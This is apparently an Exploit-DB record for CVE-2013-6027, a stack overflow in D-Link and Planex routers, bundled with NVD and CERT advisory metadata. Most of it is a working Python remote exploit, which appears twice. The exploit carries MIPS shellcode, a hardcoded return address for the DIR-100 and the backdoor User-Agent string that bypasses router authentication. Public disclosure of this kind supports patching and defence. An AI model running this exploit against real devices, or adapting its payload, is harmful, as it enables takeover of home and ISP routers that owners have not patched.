source: http://www.securityfocus.com/bid/63234/info
Multiple Vendors are prone to a stack-based buffer-overflow vulnerability.
Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices.
The following are vulnerable:
D-Link DIR-120
D-Link DI-624S
D-Link DI-524UP
D-Link DI-604S
D-Link DI-604UP
D-Link DI-604
D-Link DIR-100
D-Link TM-G5240
PLANEX COMMUNICATIONS BRL-04UR
PLANEX COMMUNICATIONS BRL-04R
PLANEX COMMUNICATIONS BRL-04CW
import sys
import urllib2
try:
url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
print str(e)
print 'Usage: %s <target ip>' % sys.argv[0]
sys.exit(1)
# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload = "\x3c\x06\x43\x21" # lui a2,0x4321
payload += "\x34\xc6\xfe\xdc" # ori a2,a2,0xfedc
payload += "\x3c\x05\x28\x12" # lui a1,0x2812
payload += "\x34\xa5\x19\x69" # ori a1,a1,0x1969
payload += "\x3c\x04\xfe\xe1" # lui a0,0xfee1
payload += "\x34\x84\xde\xad" # ori a0,a0,0xdead
payload += "\x24\x02\x0f\xf8" # li v0,4088
payload += "\x01\x01\x01\x0c" # syscall 0x40404
# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
jump_code = "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08" # jr $t9
jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102
# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
if len(shellcode_p1) < 86:
shellcode_p1 += "D" * (86 - len(shellcode_p1))
shellcode_p2 = ""
else:
shellcode_p2 = "DD" + payload[68:]
# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2
# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
{"id": "EDB-ID:38810", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Multiple Vendors 'RuntimeDiagnosticPing' Stack Buffer Overflow Vulnerability", "description": "Multiple Vendors 'RuntimeDiagnosticPing()' Stack Buffer Overflow Vulnerability. CVE-2013-6027. Remote exploit for hardware platform", "published": "2013-10-14T00:00:00", "modified": "2013-10-14T00:00:00", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/38810/", "reporter": "Craig Heffner", "references": [], "cvelist": ["CVE-2013-6027"], "lastseen": "2016-02-04T08:54:36", "viewCount": 9, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-04T08:54:36", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-6027"]}, {"type": "thn", "idList": ["THN:CF0D23B54ED7409626F66267A705513B"]}, {"type": "cert", "idList": ["VU:248083"]}], "modified": "2016-02-04T08:54:36", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/38810/", "sourceData": "source: http://www.securityfocus.com/bid/63234/info\r\n\r\nMultiple Vendors are prone to a stack-based buffer-overflow vulnerability.\r\n\r\nExploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices.\r\n\r\nThe following are vulnerable:\r\n\r\nD-Link DIR-120\r\nD-Link DI-624S\r\nD-Link DI-524UP\r\nD-Link DI-604S\r\nD-Link DI-604UP\r\nD-Link DI-604\r\nD-Link DIR-100\r\nD-Link TM-G5240\r\nPLANEX COMMUNICATIONS BRL-04UR\r\nPLANEX COMMUNICATIONS BRL-04R\r\nPLANEX COMMUNICATIONS BRL-04CW \r\n\r\nimport sys\r\nimport urllib2\r\n\r\ntry:\r\n\turl = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]\r\nexcept Exception, e:\r\n\tprint str(e)\r\n\tprint 'Usage: %s <target ip>' % sys.argv[0]\r\n\tsys.exit(1)\r\n\r\n# This is the actual payload; here it is a simple reboot shellcode.\r\n# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.\r\npayload = \"\\x3c\\x06\\x43\\x21\" # lui a2,0x4321\r\npayload += \"\\x34\\xc6\\xfe\\xdc\" # ori a2,a2,0xfedc\r\npayload += \"\\x3c\\x05\\x28\\x12\" # lui a1,0x2812\r\npayload += \"\\x34\\xa5\\x19\\x69\" # ori a1,a1,0x1969\r\npayload += \"\\x3c\\x04\\xfe\\xe1\" # lui a0,0xfee1\r\npayload += \"\\x34\\x84\\xde\\xad\" # ori a0,a0,0xdead\r\npayload += \"\\x24\\x02\\x0f\\xf8\" # li v0,4088\r\npayload += \"\\x01\\x01\\x01\\x0c\" # syscall 0x40404\r\n\r\n# The payload is split up; some of it before the return address on the stack, some after.\r\n# This little snippet skips over the return address during execution.\r\n# It assumes that your shellcode will not be using the $fp or $t9 registers.\r\nmove_sp_fp = \"\\x03\\xa0\\xf0\\x21\" # move $fp, $sp\r\njump_code = \"\\x27\\xd9\\x02\\xd4\" # addiu $t9, $fp, 724\r\njump_code += \"\\x03\\x21\\xf8\\x08\" # jr $t9\r\njump_code += \"\\x27\\xE0\\xFE\\xFE\" # addiu $zero, $ra, -0x102\r\n\r\n# Stitch together the payload chunk(s) and jump_code snippet\r\nshellcode_p1 = move_sp_fp + payload[0:68] + jump_code + \"DD\"\r\nif len(shellcode_p1) < 86:\r\n\tshellcode_p1 += \"D\" * (86 - len(shellcode_p1))\r\n\tshellcode_p2 = \"\"\r\nelse:\r\n\tshellcode_p2 = \"DD\" + payload[68:]\r\n\r\n# Build the overflow buffer, with the return address and shellcode\r\n# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13\r\n# libc_base = 0x2aaee000\r\n# ret_offset = 0x3243C\r\nbuf = shellcode_p1 + \"\\x2A\\xB2\\x04\\x3C\" + shellcode_p2\r\n\r\n# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication\r\nreq = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})\r\nurllib2.urlopen(req)\r\n", "osvdbidlist": ["98805"]}
{"cve": [{"lastseen": "2021-02-02T06:06:59", "description": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.", "edition": 4, "cvss3": {}, "published": "2013-10-19T10:36:00", "title": "CVE-2013-6027", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6027"], "modified": "2013-10-21T16:50:00", "cpe": ["cpe:/h:d-link:dir-100:-"], "id": "CVE-2013-6027", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6027", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:h:d-link:dir-100:-:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "cvelist": ["CVE-2013-6027"], "description": "None\n", "modified": "2013-12-02T15:05:00", "published": "2013-12-02T03:52:00", "id": "THN:CF0D23B54ED7409626F66267A705513B", "href": "http://thehackernews.com/2013/12/d-link-releases-router-firmware-updates.html", "type": "thn", "title": "D-Link Releases Router Firmware Updates for backdoor vulnerability", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:11", "bulletinFamily": "info", "cvelist": ["CVE-2013-6026", "CVE-2013-6027"], "description": "### Overview \n\nVarious D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected.\n\n### Description \n\nCVE-2013-6026:\n\nAccording to security researcher Craig Heffner, the firmware for various D-Link routers contains a backdoor that allows unauthenticated remote users to bypass the routers' password authentication mechanism. A router's internal web server will accept and process any HTTP requests that contain the User-Agent string \"xmlset_roodkcableoj28840ybtide\" without checking if the connecting host is authenticated. \n \nD-Link has confirmed that the affected D-Link routers disable web configuration from the WAN by default. \n \nAccording to D-Link, the following D-Link routers are affected: \n\n\n * DIR-100\n * DIR-120\n * DI-624S\n * DI-524UP\n * DI-604S\n * DI-604UP\n * DI-604+\n * TM-G5240\n \nAccording to [the original vulnerability report](<http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/>), the following Planex routers are likely affected: \n\n\n * BRL-04R\n * BRL-04UR\n * BRL-04CW\n \nIt appears that Alpha Networks may be the OEM for routers branded by D-Link and Planex (and probably other vendors). It is not clear where in the supply chain the backdoor was added, so routers from any of these vendors may be affected. \n \nCVE-2013-6027: \nA separate stack overflow vulnerability in the management web server has also been [reported](<http://pastebin.com/vbiG42VD>). \n--- \n \n### Impact \n\nAn unauthenticated remote attacker can take any action as an administrator using the remote management web server. \n \n--- \n \n### Solution \n\nD-Link is [maintaining a page](<http://www.dlink.com/be/fr/support/security>) to inform users of this issue and provide updates as patches are released. \n \n--- \n \n**Restrict Access** \n \nRestrict access to the administrative web server by disabling remote management features or by blocking HTTP requests on the external WAN interface. The administrative web server may listen on ports 80/tcp or 8080/tcp. \n \nD-Link has confirmed that the affected D-Link routers disable web configuration from the WAN by default. There is some [evidence ](<http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html>)that at least one ISP may have deployed vulnerable routers with the remote WAN management enabled. \n \n--- \n \n### Vendor Information\n\n248083\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### D-Link Systems, Inc. Affected\n\nNotified: October 16, 2013 Updated: October 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alpha Networks Inc Unknown\n\nUpdated: October 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Planex Communications Inc Unknown\n\nUpdated: October 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.5 | E:F/RL:W/RC:C \nEnvironmental | 5.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/>\n * <http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/>\n * <http://www.dlink.com/uk/en/support/security>\n * <http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html>\n * <http://pastebin.com/vbiG42VD>\n\n### Acknowledgements\n\nThanks to Craig Heffner of /DEV/TTYS0 for reporting this vulnerability.\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-6026](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-6026>), [CVE-2013-6027](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-6027>) \n---|--- \n**Date Public:** | 2013-10-12 \n**Date First Published:** | 2013-10-17 \n**Date Last Updated: ** | 2014-07-29 23:29 UTC \n**Document Revision: ** | 34 \n", "modified": "2014-07-29T23:29:00", "published": "2013-10-17T00:00:00", "id": "VU:248083", "href": "https://www.kb.cert.org/vuls/id/248083", "type": "cert", "title": "D-Link routers authenticate administrative access using specific User-Agent string", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
